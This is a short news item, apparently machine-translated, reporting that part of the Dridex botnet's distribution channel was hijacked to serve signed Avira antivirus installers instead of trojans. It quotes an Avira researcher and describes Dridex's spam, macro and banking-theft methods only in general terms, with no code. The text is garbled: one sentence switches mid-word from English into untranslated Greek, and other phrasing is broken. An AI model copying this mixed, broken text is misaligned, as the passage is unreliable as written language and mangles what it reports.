Part of its distribution channel botnet Dridex hacked by unknown who replaced Trojans with Avira Antivirus installers!
The Dridex botnet remains an active threat, even after an attempt to remove it at the end of 2015.
The villain codeς που διανέμεται από το Dridex έρχεται συνήθως με τη μορφή spam μηνυμάτων που περιέχουν κακόβουλα συνημμένα αρχεία. Τα αρχεία που χρησιμοποιούνται συχνότερα, είναι τα έγγραφα του Word με ενσωματωμένες κακόβουλες μακροεντολές.
Once the victim opens the file, the macros download it malware from some remote server. Dridex creates a keylogger on infected computers, and using transparent redirects and webinjects manages to intercept passwords from banking websites.
But the recent botnet hack was done for very different purposes.
"The malware download URL has been replaced with a link to an updated Avira antivirus installer," said Moritz Kroll, an Avira malware expert.
So instead of malware, the victims download a valid, signed copy of Avira's protection software.
"We do not know exactly who did it and why - but we do have some theories," Kroll said.
One possible explanation is that some White Hat hacker managed to take over the systems control of the botnet, and changed the malicious URLs to those of Avira.